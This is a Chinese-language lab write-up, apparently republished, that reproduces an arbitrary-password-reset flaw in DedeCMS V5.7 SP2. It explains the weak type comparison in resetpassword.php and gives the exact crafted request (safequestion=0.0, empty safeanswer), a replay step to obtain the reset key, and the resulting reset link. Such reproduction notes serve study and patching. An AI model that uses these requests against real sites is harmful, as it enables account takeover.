一、漏洞說(shuō)明
織夢(mèng)內(nèi)容管理系統(tǒng)（DeDeCMS）以其簡(jiǎn)單、實(shí)用、開(kāi)源的特點(diǎn)而著名。作為國(guó)內(nèi)最知名的PHP開(kāi)源網(wǎng)站管理系統(tǒng)，它在多年的發(fā)展中取得了顯著進(jìn)步，無(wú)論在功能還是易用性方面都有長(zhǎng)足的發(fā)展。該系統(tǒng)廣泛應(yīng)用于中小型企業(yè)門戶網(wǎng)站、個(gè)人網(wǎng)站、企業(yè)和學(xué)習(xí)網(wǎng)站建設(shè)。在中國(guó)，DedeCMS被認(rèn)為是最受歡迎的CMS系統(tǒng)之一。但是，最近發(fā)現(xiàn)該系統(tǒng)的一個(gè)漏洞位于member/resetpassword.php文件中。由于未對(duì)接收的參數(shù)safeanswer進(jìn)行嚴(yán)格的類型判斷，攻擊者可以利用弱類型比較來(lái)繞過(guò)安全措施。
DeDecms V5.7SP2正式版存在一個(gè)未修復(fù)的漏洞，允許任意用戶密碼重置。漏洞位于member/resetpassword.php文件中，因未對(duì)傳入的參數(shù)safeanswer進(jìn)行嚴(yán)格類型檢查，導(dǎo)致可使用弱類型比較繞過(guò)。在代碼分析中，當(dāng) d o p o s t 等于 s a f e q u e s t i o n 時(shí)，通過(guò)傳入的 dopost等于safequestion時(shí)，通過(guò)傳入的 dopost等于safequestion時(shí)，通過(guò)傳入的mid查詢用戶信息，判斷安全問(wèn)題和答案是否匹配。由于使用 == 而不是 ===，可繞過(guò)判斷。當(dāng)安全問(wèn)題值為0，答案值為空，經(jīng)過(guò)弱類型處理后仍可通過(guò)判斷。
二、搭建環(huán)境
織夢(mèng)CMS V5.7PS2靶場(chǎng)藍(lán)奏云下載：https://wwti.lanzouj.com/iQirO15gp8fg
訪問(wèn)https://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads進(jìn)行安裝（直接繼續(xù)）

點(diǎn)繼續(xù)

登錄后臺(tái)
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/login.php?gotopage=%2FDedeCMS-V5.7-UTF8-SP2%2Fuploads%2Fdede%2F

往下翻點(diǎn)確定即可
登錄首頁(yè)
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/index.php?upcache=1

三、漏洞復(fù)現(xiàn)
1.注冊(cè)測(cè)試賬號(hào)
先注冊(cè)兩個(gè)測(cè)試賬號(hào)，以用戶名作為密碼
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/member/index_do.php?fmdo=user&dopost=regnew

2.登錄賬號(hào)
登錄賬號(hào)，在個(gè)人主頁(yè)那里利用漏洞
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/member/

3.抓包訪問(wèn)

url后面輸入
resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2 運(yùn)行重置密碼鏈接(2是在后臺(tái)看到的那個(gè)對(duì)應(yīng)的賬戶編號(hào)。)

4.重放獲取key
發(fā)送到重放。重放幾次后會(huì)看到一個(gè)key,如下圖

5.訪問(wèn)臨時(shí)鏈接
然后我們?cè)L問(wèn)這個(gè)修改臨時(shí)密碼的鏈接，會(huì)直接跳轉(zhuǎn)到修改密碼界面
注意這個(gè)鏈接需要手動(dòng)刪除2個(gè)amp;
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=getpasswd&id=2&key=cSDrs9tm

6.修改密碼
輸入新密碼，比如admin,然后登錄試下，發(fā)現(xiàn)登錄成功，數(shù)據(jù)庫(kù)里查到的也是admin

漏洞利用成功文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-708413.html

到了這里，關(guān)于織夢(mèng)CMS_V5.7任意用戶密碼重置漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！